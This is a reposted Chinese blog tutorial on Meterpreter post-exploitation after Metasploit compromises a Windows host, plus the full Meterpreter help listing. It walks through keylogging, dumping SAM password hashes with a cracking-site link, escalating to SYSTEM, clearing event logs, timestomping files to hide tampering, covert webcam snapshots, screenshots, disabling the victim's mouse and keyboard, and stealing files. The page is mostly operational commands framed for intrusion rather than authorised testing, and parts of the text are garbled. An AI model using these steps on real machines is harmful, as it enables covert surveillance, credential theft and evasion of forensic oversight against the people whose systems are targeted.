metasploit获取shell之后进一步利用!metasploit+sessions

前端之家收集整理的这篇文章主要介绍了metasploit获取shell之后进一步利用!metasploit+sessions前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。

当你用Metasploit成功的入侵一台Windows主机后,你会获得一个Meterpreter 的Shell,今天我就会给大家讲一讲Meterpreter 获取shell以后的运用

当你看到了

[*] Meterpreter session 1 opened (192.168.195.140:4444 -> 192.168.195.139:1051)

这就代表这你在目标系统上成功的获得了Meterpreter的Shell

sessions -l用于查看你控制的电脑

你会看到:

 
 
  1. IdDescriptionTunnel
  2. 4 meterpreterx86/win32server-PC\Administrator@SERVER-PC192.168.195.140:4444->192.168.195.1:52540(192.168.195.1)

注意前面的ID号

你要控制哪台就输入:

meterpreter >sessions -i 4

例如本次案例ID号为:4

meterpreter >sysinfo

显示目标系统信息

meterpreter > backround

退出目标系统,回到Metasploit主界面

meterpreter > ps

显示目标系统上的进程

meterpreter > keyscan_start

监控目标系统键盘输入,停止监控为keyscan_stop

meterpreter >migrate

将你的Meterpreter移到另一个进程

先用PS命令查看进程后,得到进程ID,然后在执行Migrate (进程ID)

meterpreter > ipconfig

显示对方网络信息

meterpreter > getuid

获取用户的服务器运行

meterpreter > shell

进入目标电脑,命令提示

meterpreter > Idletime

目标电脑闲置了多长时间

meterpreter > Hashdump

导出对方SAM数据库里的内容,推荐一个hash破解网站:

http://www.objectif-securite.ch/products.PHP

meterpreter > getsystem

利用已自漏洞,自动提权为SYSTEM

meterpreter > clearev

清除事件日志

meterpreter > execute (某Windows指令)

在对方电脑上运行该指令

  
  
  • meterpreter>execute
  • Usage:execute-ffile[options]
  • Executesacommandontheremotemachine.
  • OPTIONS:
  • -HCreatetheprocesshiddenfromview.
  • -a<opt>Theargumentstopasstothecommand.
  • -cChannelizedI/O(requiredforinteraction).
  • -d>The'dummy'executabletolaunchwhenusing-m.
  • -f>Theexecutablecommandtorun.
  • -hHelpmenu.
  • -iInteractwiththeprocessaftercreatingit.
  • -kExecuteprocessonthemeterpreterscurrentdesktop
  • -mExecutefrommemory.
  • -s>Executeprocessinagivensessionasthesessionuser
  • -tExecuteprocesswithcurrentlyimpersonatedthreadtoken
  • meterpreter >timetomp

    修改文件时间属性

    meterpreter >timestomp c:\\jzking121.txt -c "09/09/1980 12:12:34" 修改文件创建时间

    meterpreter > timestomp c:\\jzking121.txt -m "01/01/1991 12:12:34" 修改文件修改时间

    meterpreter > timestomp c:\\jzking121.txt -f c:\\RHDSetup.log 讲文件RHDSetup.log属性复制到jzking121文件上面

    meterpreter > download文件路径)

    下载文件命令

    例如下载C盘下面的jzking121.txt文件

    meterpreter > download c:\\jzking121.txt

    [*] downloading: c:\jzking121.txt -> jzking121.txt

    [*] downloaded : c:\jzking121.txt -> jzking121.txt

    注意,文件路径中要有两个\\
    Upload指令跟Download指令类似!

    meterpreter > shutdown

    关闭目标计算机,reboot为重启计算机

    meterpreter >screenshot

    @H_602_301@ 获取目标电脑,屏幕截图

    @H_602_301@ meterpreter > uictl enable keyboard启用目标使用键盘

    meterpreter > uictl disable mouse 禁止目标使用鼠标

    @H_602_301@ enable 为启用

    @H_602_301@ disable 禁用

    meterpreter > webcam_list

    @H_602_301@ 目标系统的摄像头列表

    meterpreter > webcam_snap

    @H_602_301@ 从指定的摄像头,拍摄照片

    @H_602_301@ meterpreter > search -d c:\\ -f 1.jpg

    @H_602_301@ 搜索目标电脑,C盘1.jpg文件

         
         
    1. meterpreter>help
    2. CoreCommands
    3. =============
    4. CommandDescription
    5. ------------------
    6. ?Helpmenu
    7. backgroundBackgroundsthecurrentsession
    8. bgkillKillsabackgroundmeterpreterscript
    9. bglistListsrunningbackgroundscripts
    10. bgrunExecutesameterpreterscriptasabackgroundthread
    11. channelDisplaysinformationaboutactivechannels
    12. closeClosesachannel
    13. disable_unicode_encodingDisablesencodingofunicodestrings
    14. enable_unicode_encodingEnablesencodingofunicodestrings
    15. exitTerminatethemeterpretersession
    16. helpHelpmenu
    17. infoDisplaysinformationaboutaPostmodule
    18. interactInteractswithachannel
    19. irbDropintoirbscriptingmode
    20. loadLoadoneormoremeterpreterextensions
    21. migrateMigratetheservertoanotherprocess
    22. quitTerminatethemeterpretersession
    23. readReadsdatafromachannel
    24. resourceRunthecommandsstoredinafile
    25. runExecutesameterpreterscriptorPostmodule
    26. useDeprecatedaliasfor'load'
    27. writeWritesdatatoachannel
    28. Stdapi:FilesystemCommands
    29. ============================
    30. CommandDescription
    31. ------------------
    32. catReadthecontentsofafiletothescreen
    33. cdChangedirectory
    34. downloadDownloadafileordirectory
    35. editEditafile
    36. getlwdPrintlocalworkingdirectory
    37. getwdPrintworkingdirectory
    38. lcdChangelocalworkingdirectory
    39. lpwdPrintlocalworkingdirectory
    40. lsListfiles
    41. mkdirMakedirectory
    42. pwdPrintworkingdirectory
    43. rmDeletethespecifiedfile
    44. rmdirRemovedirectory
    45. searchSearchforfiles
    46. uploadUploadafileordirectory
    47. Stdapi:NetworkingCommands
    48. ===========================
    49. CommandDescription
    50. ------------------
    51. ifconfigDisplayinterfaces
    52. ipconfigDisplayinterfaces
    53. portfwdForwardalocalporttoaremoteservice
    54. routeViewandmodifytheroutingtable
    55. Stdapi:SystemCommands
    56. =======================
    57. CommandDescription
    58. ------------------
    59. clearevCleartheeventlog
    60. drop_tokenRelinquishesanyactiveimpersonationtoken.
    61. executeExecuteacommand
    62. getpidGetthecurrentprocessidentifier
    63. getprivsAttempttoenableallprivilegesavailabletothecurrentprocess
    64. getuidGettheuserthattheserverisrunningas
    65. killTerminateaprocess
    66. psListrunningprocesses
    67. rebootRebootstheremotecomputer
    68. regModifyandinteractwiththeremoteregistry
    69. rev2selfCallsRevertToSelf()ontheremotemachine
    70. shellDropintoasystemcommandshell
    71. shutdownShutsdowntheremotecomputer
    72. steal_tokenAttemptstostealanimpersonationtokenfromthetargetprocess
    73. sysinfoGetsinformationabouttheremotesystem,suchasOS
    74. Stdapi:UserinterfaceCommands
    75. ===============================
    76. CommandDescription
    77. ------------------
    78. enumdesktopsListallaccessibledesktopsandwindowstations
    79. getdesktopGetthecurrentmeterpreterdesktop
    80. idletimeReturnsthenumberofsecondstheremoteuserhasbeenidle
    81. keyscan_dumpDumpthekeystrokebuffer
    82. keyscan_startStartcapturingkeystrokes
    83. keyscan_stopStopcapturingkeystrokes
    84. screenshotGrabascreenshotoftheinteractivedesktop
    85. setdesktopChangethemeterpreterscurrentdesktop
    86. uictlControlsomeoftheuserinterfacecomponents
    87. Stdapi:WebcamCommands
    88. =======================
    89. CommandDescription
    90. ------------------
    91. webcam_listListwebcams
    92. webcam_snapTakeasnapshotfromthespecifiedwebcam
    93. Priv:ElevateCommands
    94. ======================
    95. CommandDescription
    96. ------------------
    97. getsystemAttempttoelevateyourprivilegetothatoflocalsystem.
    98. Priv:PassworddatabaseCommands
    99. ================================
    100. CommandDescription
    101. ------------------
    102. hashdumpDumpsthecontentsoftheSAMdatabase
    103. Priv:TimestompCommands
    104. ========================
    105. CommandDescription
    106. ------------------
    107. timestompManipulatefileMACEattributes

    本文出自 “jzking121' blog博客,请务必保留此出处http://jzking121.blog.51cto.com/5436671/1074524

    猜你在找的Bash相关文章